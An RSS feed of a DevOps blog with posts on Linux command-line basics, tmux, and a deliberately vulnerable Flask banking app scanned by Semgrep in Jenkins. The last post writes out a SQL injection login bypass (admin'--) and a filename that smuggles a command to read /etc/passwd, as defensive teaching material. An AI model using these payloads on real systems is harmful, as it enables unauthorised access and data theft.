<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Prakyath Reddy | DevOps, SRE & Cloud Architecture]]></title><description><![CDATA[Insights from a Sr. DevSecOps Engineer at RingCentral & Oracle. Expert in Kubernetes, CI/CD automation, and building secure, scalable cloud infrastructure for 450,000+ global customers]]></description><link>https://blog.prakyath.dev</link><generator>RSS for Node</generator><lastBuildDate>Wed, 29 Apr 2026 01:39:39 GMT</lastBuildDate><atom:link href="https://blog.prakyath.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Linux Fundamentals - What I Learned Getting Comfortable With the Command Line]]></title><description><![CDATA[The goal I set for myself was simple: learn to live completely in the command line. Even when working with something like AWS, use the CLI and avoid depending on the GUI.
This post is a compilation of]]></description><link>https://blog.prakyath.dev/linux-fundamentals-what-i-learned-getting-comfortable-with-the-command-line</link><guid isPermaLink="true">https://blog.prakyath.dev/linux-fundamentals-what-i-learned-getting-comfortable-with-the-command-line</guid><category><![CDATA[Linux]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[cli]]></category><category><![CDATA[vim]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Wed, 18 Mar 2026 04:11:57 GMT</pubDate><content:encoded><![CDATA[<p>The goal I set for myself was simple: learn to live completely in the command line. Even when working with something like AWS, use the CLI and avoid depending on the GUI.</p>
<p>This post is a compilation of what I picked up while doing that.</p>
<h2>Linux is Just the Kernel</h2>
<p>Linux is just the kernel, the software that controls and manipulates the system's hardware. A Linux Distribution is the complete package of the Linux kernel + GUI + default apps + package managers + shell, etc. that makes up an OS.</p>
<p>The kernel is like the engine of a car. The distro or OS is the complete car with chassis, AC, interiors, body and everything else.</p>
<h2>Raspberry Pi</h2>
<p>A Raspberry Pi is just the hardware: a bare circuit board with minimal specs. It does not come with an OS, kernel or GUI. It has RAM, but no built-in storage.</p>
<p>The kernel, OS, files, data - everything exists on a micro-SD card. Raspberry Pi Imager (a flashing tool) can be downloaded from the official Raspberry Pi website and used to write the OS onto the SD card. Then we just insert the card and turn it on.</p>
<h2>Flashing - What It Really Means</h2>
<p>Usually in an SD card or any storage device, there's a file system structure that determines where a piece of data lives or where new data should be written. Think of it as a catalog of the data, plus the system that manages and searches it.</p>
<p>When we connect a pendrive to a laptop, the laptop sees the pendrive as just another drive with its own file system (FAT32, exFAT, EXT4, etc.). When we paste data onto the pendrive, that file system tells the pendrive hardware where to place those specific bytes.</p>
<p>With flashing, we don't copy the image onto the SD card at a location chosen by a file system. Instead we bypass the file system entirely and write the OS image block-by-block directly onto the SD card's hardware, replacing whatever existed in those blocks before.</p>
<p>Afterwards the SD card doesn't merely contain the image as a file among other files - its raw blocks <em>are</em> the OS, from the hardware level up.</p>
<p>Some tools for flashing:</p>
<ul>
<li><p><strong>Rufus</strong> - Windows tool for writing bootable images (e.g. to repurpose an old Windows laptop into Linux)</p>
</li>
<li><p><strong>BalenaEtcher</strong> - for macOS: <a href="https://etcher.balena.io/">https://etcher.balena.io/</a></p>
</li>
<li><p><strong>UTM</strong> - for virtualization on Mac (virtualizes ARM-native OS images, emulates other architectures using QEMU)</p>
</li>
<li><p><strong>VMware Fusion</strong> - also a good option for virtualization on macOS</p>
</li>
</ul>
<h2>Terminal vs Shell</h2>
<p>Terminal is just the visual interface. It does not understand commands or anything.</p>
<p>Shell is the primary engine that processes commands, talks to the kernel, receives the output and conveys it to the terminal to display. When you connect to a remote host, the terminal belongs to your local Mac, but the shell belongs to the remote host.</p>
<p>Bash is the default shell on most Linux distributions; modern macOS defaults to Zsh.</p>
<p>The flow looks like this: terminal reflects the input I pass from the keyboard -&gt; shell starts a process, parses it, expands it if needed -&gt; kernel starts a child process -&gt; kernel does the work, conveys the output and the child process exits -&gt; shell process conveys output to terminal -&gt; terminal displays the output.</p>
<p>Commands are just programs. <code>cat</code> is a program (<code>which cat</code> returns <code>/usr/bin/cat</code>). <code>ls</code> is a program too.</p>
<p>To check which shell I'm using: <code>echo $SHELL</code>. What follows <code>$</code> is a variable. By convention, all-caps names are system or environment variables set by the shell itself.</p>
<h2>Everything is a File on Linux</h2>
<p>This is one of those things that sounds abstract until you see it in practice.</p>
<p>Even processes are files. They may not be files that sit on the hard disk, but the kernel creates them on the fly just so I can read them using <code>cat</code>. The <code>/proc</code> folder is where the kernel presents process information as files. Similarly, every process gets its own directory of files that describe it. The kernel's process management is <em>presented</em> as files.</p>
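<p><code>/proc/self</code> is a kernel-provided symlink that resolves to whichever process opens it, which makes this easy to see from any Linux shell:</p>
<pre><code class="language-bash">cat /proc/self/comm               # prints "cat" - the reading process's own name
ls /proc/self/fd                  # open file descriptors of the ls process, presented as files
grep '^State' /proc/self/status   # current state of the grep process, readable as plain text
</code></pre>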
<p><code>cat "something" &gt; /dev/null</code> - <code>/dev/null</code> isn't a regular file backed by the disk; it's a character device the kernel provides as a black hole that discards everything written to it. But it looks like a file to any program, which makes it convenient to redirect unwanted output into it.</p>
<p>When a program opens a network connection, the kernel creates a file descriptor that describes the connection. The program interacts with the file, and the corresponding actions are handled by the kernel. The program thinks it's "reading a file", but the kernel is actually pulling information from the network. The program thinks it's "writing to a file", but the kernel is actually sending data over the network.</p>
<p>Even pipes work this way. <code>ps aux | grep ssh</code> - <code>ps aux</code> just writes to a file and <code>grep ssh</code> just reads from a file. The kernel creates an anonymous pipe file connecting the two, but both commands treat it as ordinary file I/O.</p>
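<p>A named pipe (FIFO) makes this visible: it's an actual file on disk that behaves exactly like the anonymous pipe between two commands. The path below is just an example.</p>
<pre><code class="language-bash">mkfifo /tmp/demo-pipe              # create a pipe that lives in the filesystem
echo "hello" &gt; /tmp/demo-pipe &amp;    # writer blocks until a reader opens the pipe
cat /tmp/demo-pipe                 # reader prints: hello
rm /tmp/demo-pipe
</code></pre>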
<h2>Key Directories</h2>
<ul>
<li><p><code>/home</code> - user home directories</p>
</li>
<li><p><code>/etc</code> - system configuration files</p>
</li>
<li><p><code>/var</code> - variable data: logs, databases, mail</p>
</li>
<li><p><code>/tmp</code> - temporary files</p>
</li>
<li><p><code>/usr</code> - where installed software lives</p>
</li>
<li><p><code>/bin</code> - most command binaries</p>
</li>
<li><p><code>/sbin</code> - system administration binaries</p>
</li>
<li><p><code>/opt</code> - optional 3rd party software</p>
</li>
<li><p><code>/dev</code> - device files</p>
</li>
<li><p><code>/proc</code> - process and kernel information</p>
</li>
</ul>
<h2>Installing Software</h2>
<p>Package managers vary by distro: <code>apt</code> for Debian-based (Ubuntu), <code>apk</code> for Alpine, <code>pacman</code> for Arch, <code>dnf</code> for RHEL/Fedora.</p>
<pre><code class="language-bash">sudo apt update                          # update package repository list
sudo apt upgrade                         # upgrade all installed packages
apt search htop                          # search for a package
apt show htop                            # show info about a package
sudo apt install htop tree curl vim      # install packages with dependencies
sudo apt remove htop                     # remove package, keep config files
sudo apt purge htop                      # remove package including config files
apt list --installed                     # list all installed packages
apt list --installed | grep htop         # search within installed packages
</code></pre>
<p>When we install a program, it usually comes with 2 kinds of files: program files that carry the binaries to run it, and configuration files that customize the environment and variables to our requirements. System-wide config files are stored in <code>/etc/</code>. User-specific config files are usually dotfiles in the home directory, ex: <code>.gitconfig</code>.</p>
<h2>Users, Groups &amp; Permissions</h2>
<pre><code class="language-bash">whoami                    # current user
who                       # logged in users
id                        # user and group IDs
sudo adduser testuser     # create user
sudo deluser testuser     # delete user
</code></pre>
<p>File permissions follow the format: <code>-rwxrwxrwx</code> - file type, then owner, group, others. Read is 4, write is 2, execute is 1.</p>
<pre><code class="language-bash">chmod 777 file-name       # or u+x, o+rw, etc.
chown user file           # change owner
chgrp group file          # change group
sudo -i                   # get root shell
</code></pre>
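<p>The octal digits are just sums of those values - one digit each for owner, group and others:</p>
<pre><code class="language-bash">touch demo.sh
chmod 754 demo.sh     # 7 = 4+2+1 (rwx) owner, 5 = 4+1 (r-x) group, 4 = r-- others
ls -l demo.sh         # shows -rwxr-xr--
</code></pre>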
<h2>Input, Output &amp; Pipes</h2>
<p>Three streams: standard input, standard output, standard error.</p>
<pre><code class="language-bash">command &gt; file.txt              # redirect output to file
command &gt;&gt; file.txt             # append instead of overwrite
wc -l &lt; /etc/passwd            # redirect input from file
ls /nonexistent 2&gt; /dev/null   # discard error output
ls /etc/ /nonexist &amp;&gt; all.txt  # redirect both stdout and stderr
</code></pre>
<p>Pipes send stdout of one command into stdin of another:</p>
<pre><code class="language-bash">ls /etc | head -5
cat names.txt | sort | uniq -c
echo "HELLoo" | tr 'A-Z' 'a-z'
ls /etc/ | tee list.txt         # write to screen AND to a file
</code></pre>
<h2>Processes</h2>
<p>Processes have a PID, parent process (PPID), owner, and current state.</p>
<pre><code class="language-bash">ps aux                     # list all processes
htop                       # real-time process viewer
kill -9 &lt;PID&gt;              # kill a process
pkill -f "python script.py" # kill by matching pattern
sleep 60 &amp;                 # run in background
jobs                       # list background jobs
fg %1                      # bring job back to foreground
</code></pre>
<p>If a process is running in the foreground, <code>Ctrl+Z</code> pauses it, then <code>bg</code> takes it to the background.</p>
<h3>systemd</h3>
<p>systemd initializes the system at boot and manages services. It's a compiled binary on disk. Once the Linux kernel finishes initializing, it triggers systemd which becomes PID 1.</p>
<p>We use <code>systemctl</code> to interact with systemd, which handles starting, stopping or managing daemons. Unlike SysVinit which was the standard earlier, systemd runs the booting process in parallel. It manages the order of starting services, handles dependencies, mounts filesystems, sets up networking, manages user logins and so on.</p>
<p>Every service produces logs. journald captures those and can be queried through <code>journalctl</code>.</p>
<pre><code class="language-bash">sudo systemctl start cron            # start a service (stop, restart, enable, disable)
journalctl --since "1 hour ago"      # query logs
pstree                               # visualize process tree
</code></pre>
<h2>Networking</h2>
<p><code>192.168.xxx.xxx</code> addresses always belong to a private internal network (the RFC 1918 <code>192.168.0.0/16</code> range).</p>
<pre><code class="language-bash">ip a                # view IP address, look for inet line on eth0
ip route            # view routing table, default points to WiFi router (gateway)
hostname            # view hostname
ping &lt;ip&gt;           # test connectivity
curl https://example.com    # download files / make HTTP requests
wget &lt;url&gt;                  # download files
</code></pre>
<h3>Ports and Sockets</h3>
<p>A <strong>port</strong> is just a number. A <strong>socket</strong> is a combination of IP address + port number + protocol (TCP/UDP). When a program wants to connect over the network, it asks the kernel to create a socket.</p>
<p>One port can have multiple sockets. For example, when we start sshd, it binds to port 22 and calls the <code>listen()</code> system call, putting the socket in LISTEN state. When a client connects, the kernel creates a new socket in ESTABLISHED state for that connection (via <code>accept()</code>), while the original socket continues listening.</p>
<pre><code class="language-bash">ss -tunlp           # see what ports are open and listening
ss -tun             # see active/established connections
</code></pre>
<h3><code>/etc/hosts</code></h3>
<p>Used to assign hostnames or shortcuts that we can easily remember, avoiding typing IP addresses every time. Can also be used to indirectly block websites by pointing, for example, <code>www.facebook.com</code> to the loopback address <code>127.0.0.1</code>.</p>
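<p>A couple of hypothetical entries illustrating both uses:</p>
<pre><code class="language-plaintext"># /etc/hosts
192.168.1.12    homelab            # now "ssh homelab" works instead of typing the IP
127.0.0.1       www.facebook.com   # crude block: the name now resolves to loopback
</code></pre>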
<h3>SSH</h3>
<p>How it works behind the scenes:</p>
<ol>
<li><p>Client runs <code>ssh username@ip-address</code></p>
</li>
<li><p>SSH client creates TCP connection to server on port 22</p>
</li>
<li><p>TCP 3-way handshake</p>
</li>
<li><p>Diffie-Hellman key exchange</p>
</li>
<li><p>Authentication (password or key)</p>
</li>
<li><p>Encrypted channel established</p>
</li>
<li><p>Commands from our terminal run on the remote server</p>
</li>
</ol>
<pre><code class="language-bash"># Generate SSH keys
ssh-keygen -t ed25519

# Copy public key to server
ssh-copy-id user@ip-address

# If ssh-copy-id isn't available
cat ~/.ssh/id_ed25519.pub | ssh user@192.168.100.71 "mkdir -p ~/.ssh &amp;&amp; cat &gt;&gt; ~/.ssh/authorized_keys"

# Disable password authentication on server
vi /etc/ssh/sshd_config    # change PasswordAuthentication to no
sudo systemctl restart ssh # on some distros the service is named sshd
</code></pre>
<p>SSH config for shortcuts (<code>~/.ssh/config</code>):</p>
<pre><code class="language-plaintext">Host linux
    HostName 192.168.1.12
    User admin
    IdentityFile ~/.ssh/id_ed25519
</code></pre>
<p>Now <code>ssh linux</code> just works.</p>
<p>Copy files with SCP:</p>
<pre><code class="language-bash">scp file.txt admin@192.168.1.12:/home/admin              # local to remote
scp admin@192.168.1.12:/var/log/syslog ./                 # remote to local
scp -r directory/ admin@192.168.1.12:/home/admin          # copy directory
</code></pre>
<h2>Tmux</h2>
<p>Any process we execute on a remote server through SSH will break if we lose connection to the server. I generally used nohup if I knew it was going to take a lot of time, which I now realize was a pretty amateur approach. I discovered that tmux offers a much better way. It lets us run multiple terminal sessions inside one window and keeps them running even if we lose the SSH connection to the server.</p>
<p>If we want to carry out multiple tasks on the same server, we'd normally open multiple SSH connections. Tmux handles that by letting us run multiple windows and panes inside the same SSH session - watch logs in one terminal, edit files in another, and run scripts in a third. Without tmux, we would need 3 SSH connections.</p>
<pre><code class="language-bash">sudo apt install tmux
tmux                              # start tmux
tmux new -s devops-lab            # create named session
tmux ls                           # list sessions
tmux attach -t devops-lab         # reattach to session
tmux kill-session -t devops-lab   # kill session
</code></pre>
<p>All tmux commands start with <code>Ctrl+b</code>:</p>
<p><strong>Sessions:</strong> <code>Ctrl+b d</code> to detach</p>
<p><strong>Windows</strong> (each window is a full terminal):</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b c</code></td>
<td>Create new window</td>
</tr>
<tr>
<td><code>Ctrl+b n</code></td>
<td>Next window</td>
</tr>
<tr>
<td><code>Ctrl+b 2</code></td>
<td>Jump to window 2</td>
</tr>
<tr>
<td><code>Ctrl+b ,</code></td>
<td>Rename window</td>
</tr>
<tr>
<td><code>Ctrl+b &amp;</code></td>
<td>Close window</td>
</tr>
</tbody></table>
<p><strong>Panes</strong> (split each window into separate terminals):</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b "</code></td>
<td>Split horizontally</td>
</tr>
<tr>
<td><code>Ctrl+b %</code></td>
<td>Split vertically</td>
</tr>
<tr>
<td><code>Ctrl+b arrows</code></td>
<td>Move between panes</td>
</tr>
<tr>
<td><code>Ctrl+b z</code></td>
<td>Toggle full-screen on a pane</td>
</tr>
</tbody></table>
<h2>Configuration &amp; Customization</h2>
<h3>Dotfiles</h3>
<p>Hidden files meant to manage configuration for the shell, editors, or other tools. Ex: <code>.zshrc</code>, <code>.bashrc</code>, <code>.profile</code>.</p>
<p><code>.profile</code> is loaded once per login session (SSH login, console login). It holds environment variables, PATH additions, and the like.</p>
<p><code>.bashrc</code> is loaded by every new interactive shell, because customizations like aliases, prompts and shell options are not inherited by child shells and have to be set each time.</p>
<p>We usually put everything in <code>.bashrc</code> and source it from <code>.profile</code> so that login shells and new terminals behave consistently.</p>
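<p>A minimal sketch of that pattern in <code>~/.profile</code> (it mirrors the stock Debian/Ubuntu arrangement; the <code>EDITOR</code> line is just an example):</p>
<pre><code class="language-bash"># ~/.profile - runs once per login session
export EDITOR=vim                        # env vars and PATH tweaks live here
if [ -n "$BASH_VERSION" ] &amp;&amp; [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"                    # pull in aliases, prompt, shell options
fi
</code></pre>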
<h3>Starship Prompt</h3>
<p>Starship works across shells and VMs.</p>
<pre><code class="language-bash">curl -sS https://starship.rs/install.sh | sh
echo 'eval "$(starship init bash)"' &gt;&gt; ~/.bashrc
source ~/.bashrc
</code></pre>
<p>Starship reads <code>~/.config/starship.toml</code>, but it doesn't get created automatically:</p>
<pre><code class="language-bash">mkdir -p ~/.config
vi ~/.config/starship.toml
</code></pre>
<p>Minimal configuration:</p>
<pre><code class="language-toml">command_timeout = 1000
"$schema" = 'https://starship.rs/config-schema.json'
add_newline = true

[character]
success_symbol = '[➜](bold green)'

[package]
disabled = true
</code></pre>
<p>Explore more at: <a href="https://starship.rs/config/">https://starship.rs/config/</a></p>
<h3>Vim Configuration</h3>
<pre><code class="language-bash">cp /etc/vim/vimrc ~/.vimrc
# uncomment what's relevant
</code></pre>
<h3>Tmux Configuration</h3>
<pre><code class="language-bash">vi ~/.tmux.conf
</code></pre>
<pre><code class="language-plaintext"># Start window numbering at 1 (not 0)
set -g base-index 1
setw -g pane-base-index 1

# Enable mouse support
set -g mouse on

# Increase history limit
set -g history-limit 10000

# 256 color support
set -g default-terminal "tmux-256color"
set-option -sa terminal-overrides ',xterm-256color:RGB'
</code></pre>
<hr />
<p><em>Book to read next: Unix and Linux System Administration Handbook</em></p>
]]></content:encoded></item><item><title><![CDATA[Tmux - Why Every DevOps Engineer Should Use It]]></title><description><![CDATA[If you've ever had a long-running process die because your SSH connection dropped, you know the pain. I used to rely on nohup to keep things alive in the background, which worked but felt like a hack.]]></description><link>https://blog.prakyath.dev/tmux-why-every-devops-engineer-should-use-it</link><guid isPermaLink="true">https://blog.prakyath.dev/tmux-why-every-devops-engineer-should-use-it</guid><category><![CDATA[tmux]]></category><category><![CDATA[Devops]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Kubernetes]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Tue, 17 Mar 2026 16:31:26 GMT</pubDate><content:encoded><![CDATA[<p>If you've ever had a long-running process die because your SSH connection dropped, you know the pain. I used to rely on <code>nohup</code> to keep things alive in the background, which worked but felt like a hack. Then I discovered tmux, and it changed how I work on remote servers entirely.</p>
<h2>The Problem</h2>
<p>Any process you run on a remote server through SSH is tied to that connection. Lose the connection - laptop sleeps, Wi-Fi drops, terminal closes - and your process dies with it. That deployment script you've been running for 30 minutes? Gone.</p>
<p>On top of that, if you need to do multiple things on the same server - watch logs, edit files, run scripts - you end up opening multiple SSH connections. That's multiple terminals, multiple authentication steps, and if your internet hiccups, all of them go down.</p>
<h2>How Tmux Solves This</h2>
<p>Tmux (Terminal Multiplexer) lets you run multiple terminal sessions inside a single SSH connection, and keeps them running even if you disconnect. You can detach, close your laptop, go grab coffee, come back, reattach, and everything is exactly where you left it.</p>
<p>It organizes your workspace into three layers:</p>
<ul>
<li><p><strong>Sessions</strong> - the outermost container. Persists on the server until you kill it.</p>
</li>
<li><p><strong>Windows</strong> - like tabs within a session. Each one is a full-screen terminal.</p>
</li>
<li><p><strong>Panes</strong> - splits within a window. Run different things side by side.</p>
</li>
</ul>
<h2>Getting Started</h2>
<p>Install tmux and start it:</p>
<pre><code class="language-bash">sudo apt install tmux
tmux
</code></pre>
<p>You'll notice a green status bar at the bottom. You're now inside tmux. All tmux commands start with a prefix: <code>Ctrl+b</code>, followed by another key.</p>
<h2>Session Management</h2>
<pre><code class="language-bash">tmux new -s devops-lab       # create a named session
tmux ls                      # list all sessions
tmux attach -t devops-lab    # reattach to a session
tmux kill-session -t devops-lab  # kill a session
</code></pre>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b d</code></td>
<td>Detach from session (keeps running in background)</td>
</tr>
</tbody></table>
<h2>Window Management</h2>
<p>Each window is a full terminal, like having multiple tabs in one session, all through a single SSH connection.</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b c</code></td>
<td>Create new window</td>
</tr>
<tr>
<td><code>Ctrl+b n</code></td>
<td>Next window</td>
</tr>
<tr>
<td><code>Ctrl+b 0-9</code></td>
<td>Jump to window by number</td>
</tr>
<tr>
<td><code>Ctrl+b ,</code></td>
<td>Rename current window</td>
</tr>
<tr>
<td><code>Ctrl+b &amp;</code></td>
<td>Close current window</td>
</tr>
</tbody></table>
<h2>Pane Management</h2>
<p>Panes split a window into multiple terminals. This is where tmux really shines: monitor logs in one pane, edit config in another, and run commands in a third.</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b "</code></td>
<td>Split horizontally</td>
</tr>
<tr>
<td><code>Ctrl+b %</code></td>
<td>Split vertically</td>
</tr>
<tr>
<td><code>Ctrl+b ←↑→↓</code></td>
<td>Move between panes</td>
</tr>
<tr>
<td><code>Ctrl+b z</code></td>
<td>Toggle full-screen on a pane</td>
</tr>
</tbody></table>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/4a42eca1-b10a-441e-815f-e96d4e30d04a.png" alt="" style="display:block;margin:0 auto" />

<h2>My Typical Workflow</h2>
<p>When I SSH into a server for any real work, the first thing I do is:</p>
<pre><code class="language-bash">tmux new -s work
</code></pre>
<p>Then I set up my workspace, split into panes, tail logs on one side, keep a shell on the other. If I need to step away, <code>Ctrl+b d</code> to detach. When I'm back, <code>tmux attach -t work</code> picks up right where I left off.</p>
<p>No more lost processes. No more juggling multiple SSH connections. Just one session that survives anything.</p>
<hr />
<p><em>If you're working with remote servers in any capacity, make tmux part of your muscle memory. It's one of those tools that once you start using, you wonder how you ever worked without it.</em></p>
]]></content:encoded></item><item><title><![CDATA[How I Built a Deliberately Vulnerable Banking App to Demonstrate Automated Security Scanning with Semgrep and Jenkins]]></title><description><![CDATA[Most developers I've worked with believe their code is secure because their tests pass. I used to think the same. This post is about proving that belief wrong — with a working demo anyone can run them]]></description><link>https://blog.prakyath.dev/how-i-built-a-deliberately-vulnerable-banking-app-to-demonstrate-automated-security-scanning-with-semgrep-and-jenkins</link><guid isPermaLink="true">https://blog.prakyath.dev/how-i-built-a-deliberately-vulnerable-banking-app-to-demonstrate-automated-security-scanning-with-semgrep-and-jenkins</guid><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Wed, 11 Mar 2026 11:07:33 GMT</pubDate><content:encoded><![CDATA[<p>Most developers I've worked with believe their code is secure because their tests pass. I used to think the same. This post is about proving that belief wrong — with a working demo anyone can run themselves.</p>
<p>I built VulnBank: a deliberately vulnerable Flask banking application, wired up to a Jenkins CI/CD pipeline with Semgrep scanning at every stage. The goal was simple — show what automated security scanning actually looks like in practice, what it catches, and where its limits are.</p>
<p>The full project is available here: <a href="https://github.com/PrakyathReddy/VulnBank-Semgrep">https://github.com/PrakyathReddy/VulnBank-Semgrep</a></p>
<h3>THE CORE IDEA</h3>
<p>Functional correctness and security correctness are not the same thing.</p>
<p>A banking app can transfer money correctly, authenticate users correctly, and render pages correctly — and still be completely compromised by an attacker in under five minutes.</p>
<p>The demo makes this concrete. Every unit test passes. The app works exactly as intended. And yet Semgrep finds four blocking vulnerabilities the moment it scans the code.</p>
<p>That moment — tests green, Semgrep red, pipeline blocked — is the entire point.</p>
<h3>WHAT'S IN THE APP</h3>
<p>VulnBank is a minimal Flask app with six features, each containing an intentional vulnerability:</p>
<p><strong>SQL Injection</strong> — Login Page</p>
<p>The login form concatenates user input directly into a SQL query string. An attacker can enter the username:</p>
<p><code>admin'--</code></p>
<p>and bypass the password check entirely. The double-dash comments out the rest of the query. No password needed. Logged in as admin.</p>
<p>This is one of the oldest and most common vulnerabilities in web applications. It's also one of the easiest to fix — parameterized queries solve it completely. But under deadline pressure, developers reach for f-strings, and this is what happens.</p>
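<p>To see why the payload works, compare the query the developer intended with what the concatenation produces (the exact query text in VulnBank may differ; this is the general shape):</p>
<pre><code class="language-plaintext">-- Intended:
SELECT * FROM users WHERE username = 'admin' AND password = 'secret'

-- With the username admin'-- the concatenated string becomes:
SELECT * FROM users WHERE username = 'admin'--' AND password = ''
-- everything after -- is a comment, so the password check never runs
</code></pre>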
<p><strong>IDOR</strong> — Account Viewer</p>
<p>After logging in, your account is at /account/1. If you change that number to /account/2, you see someone else's account. /account/3 shows another. There is no ownership check anywhere in the code — the app verifies you are logged in, but never verifies the account belongs to you.</p>
<p>This is an Insecure Direct Object Reference (IDOR). It's consistently in the OWASP Top 10 because it's so common and so easy to miss in code review.</p>
<p><strong>Command Injection</strong> — File Upload</p>
<p>The file upload feature runs a shell command to inspect the uploaded file. The filename comes from the user and goes directly into that shell command with <code>shell=True</code>. An attacker uploads a file named:</p>
<p><code>photo.jpg; cat /etc/passwd</code></p>
<p>The shell executes both commands, and the server's <code>/etc/passwd</code> user database is returned to the attacker.</p>
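<p>The failure mode is easy to reproduce locally. This snippet simulates the vulnerable pattern with a harmless <code>echo</code> standing in for <code>cat /etc/passwd</code>:</p>
<pre><code class="language-bash">fname='photo.jpg; echo INJECTED'   # attacker-controlled "filename"
sh -c "ls -l $fname"               # the ; splits this into two commands:
                                   # ls fails, then INJECTED is printed
</code></pre>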
<p><strong>Hardcoded Secrets</strong></p>
<p>The Flask secret key, admin credentials, and AWS keys are all hardcoded directly in <code>app.py</code>:</p>
<pre><code class="language-python">app.secret_key = "supersecretkey123"
ADMIN_PASSWORD = "admin123"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
</code></pre>
<p>Anyone with repository access has these credentials. In a public repo, that means everyone.</p>
<p><strong>Weak Cryptography</strong> — Password Reset</p>
<p>Password reset tokens are generated using MD5 of the username. MD5 is cryptographically broken. The token for any user is deterministic and precomputable. An attacker who knows your username can generate your reset token without ever interacting with the server.</p>
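<p>You can see the problem from any shell: hashing the same username always yields the same value, so an attacker can compute the token offline (<code>md5sum</code> here stands in for whatever hash call the app makes):</p>
<pre><code class="language-bash">printf '%s' 'alice' | md5sum | cut -d' ' -f1   # run it twice - same "token" both times
</code></pre>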
<p><strong>Vulnerable Dependencies</strong></p>
<p>requirements.txt pins requests to version 2.18.0, which carries multiple known CVEs including credential exposure via HTTP redirects. The app also pins an old version of Flask with a known advisory.</p>
<h3>THE JENKINS PIPELINE</h3>
<p>The pipeline has six stages. Each one builds on the last:</p>
<p><strong>Stage 1 — Checkout.</strong> Jenkins pulls the latest code from the GitHub repository. Nothing runs until the code is local.</p>
<p><strong>Stage 2 — Install.</strong> Sets up a Python virtual environment, installs application dependencies, and installs Semgrep and pip-audit.</p>
<p><strong>Stage 3 — Semgrep SAST.</strong> Runs Semgrep against the application code with <code>--config auto</code>. Semgrep loads rules appropriate for the detected language (Python/Flask) and scans every file. This is where SQL injection, command injection, and NaN injection are caught.</p>
<p><strong>Stage 4 — Semgrep Secrets.</strong> Runs Semgrep with the <code>p/secrets</code> ruleset against the entire repository. Designed to catch hardcoded API keys, tokens, and credentials.</p>
<p><strong>Stage 5 — SCA with pip-audit.</strong> Runs pip-audit against <code>requirements.txt</code>. This stage reads every pinned dependency, queries vulnerability databases, and reports every known CVE. This is where the 17 vulnerabilities across four packages surface.</p>
<p><strong>Stage 6 — Security Gate.</strong> Evaluates whether any prior stage failed. If anything failed, the gate blocks deployment with a clear message. The deploy stage never runs.</p>
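<p>A minimal sketch of what such a Jenkinsfile could look like - stage names and shell steps here are illustrative, not the project's exact file:</p>
<pre><code class="language-groovy">pipeline {
    agent any
    stages {
        stage('Checkout')        { steps { checkout scm } }
        stage('Install')         { steps { sh 'python3 -m venv venv &amp;&amp; . venv/bin/activate &amp;&amp; pip install -r requirements.txt semgrep pip-audit' } }
        stage('Semgrep SAST')    { steps { sh '. venv/bin/activate &amp;&amp; semgrep scan --config auto --error .' } }
        stage('Semgrep Secrets') { steps { sh '. venv/bin/activate &amp;&amp; semgrep scan --config p/secrets --error .' } }
        stage('SCA')             { steps { sh '. venv/bin/activate &amp;&amp; pip-audit -r requirements.txt' } }
        // declarative pipelines skip later stages when an earlier one fails,
        // so reaching this stage means every scan came back clean
        stage('Security gate')   { steps { echo 'All scans passed - safe to deploy' } }
    }
}
</code></pre>
<p>The <code>--error</code> flag makes Semgrep exit non-zero when it has blocking findings, which is what lets a finding fail the stage.</p>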
<h3>WHAT SEMGREP ACTUALLY FOUND</h3>
<p>Running 128 rules across 17 files, Semgrep reported four blocking findings:</p>
<p><strong>Finding 1</strong>: SQL Injection (Django rule). File: <code>app.py</code>, Line 113. User input concatenated directly into a raw SQL query string.</p>
<p><strong>Finding 2</strong>: SQL Injection (Flask-specific rule). File: <code>app.py</code>, Line 113. Same line, flagged by a Flask-specific rule as well. Two different rule authors caught the same issue independently — which adds confidence.</p>
<p><strong>Finding 3</strong>: NaN Injection. File: <code>app.py</code>, Line 175. User input passed directly into <code>float()</code>. An attacker can pass the string "nan", which Python will cast to float NaN, causing undefined comparison behavior downstream. This one was not intentionally planted — Semgrep found it anyway.</p>
<p><strong>Finding 4</strong>: subprocess with shell=True. File: <code>app.py</code>, Line 228. <code>subprocess.run</code> called with <code>shell=True</code> and user-controlled input. The command injection vulnerability.</p>
<p><strong>Scan summary: 4 findings, 4 blocking, 128 rules run, 17 files scanned.</strong></p>
<p>The command injection was caught. The SQL injection was caught twice. A bonus vulnerability nobody planted was found. The pipeline failed. Deploy was blocked.</p>
<h3>WHAT SEMGREP DID NOT CATCH</h3>
<p><strong>Hardcoded secrets</strong> - the generic strings like "supersecretkey123" and "admin123" did not match any pattern in the p/secrets ruleset. Semgrep's secrets rules are designed around recognizable formats: AWS key patterns that start with AKIA, GitHub tokens that start with ghp_, JWTs, private keys. A generic password assignment doesn't trigger them.</p>
<p>This is not a bug — it's a design decision. Flagging every string assignment would create overwhelming noise. But it means generic hardcoded credentials require either a paid tier with more rules, or custom rules written for your specific codebase.</p>
<p>IDOR was not caught either. IDOR is a logic flaw, not a code pattern. Semgrep can't know that your business rules require an ownership check on every account query — only you know that. This is exactly the use case for custom rules, which the project also includes.</p>
